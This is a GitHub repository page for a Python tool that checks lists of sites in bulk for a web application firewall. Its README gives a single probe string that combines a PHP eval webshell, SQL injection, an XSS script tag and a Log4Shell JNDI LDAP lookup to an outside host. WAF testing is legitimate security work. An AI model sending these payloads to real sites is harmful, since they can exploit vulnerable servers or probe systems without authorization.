Skip to content

Huck-Lim/check-waf

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

check-waf

批量检查站点是否存在waf

how to use

python3 check-waf.py urls.txt

说明

默认生成的Excel表格名字为:{txt文件名}_waf_results_{当前时间}.xlsx

检测规则

image

payload:?a=<%3fphp+%40eval($_GET['cmd'])%3b%3f>&b=1'+or+'1'%3d'1&c=${jndi%3aldap%3a//10.0.0.1%3a8080/Exploit}&s=<script>alert(1)</script>&id=UNION+SELECT+ALL+FROM+information_schema+AND+'+or+SLEEP(5)+or+'

About

批量检查是否存在waf站点

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages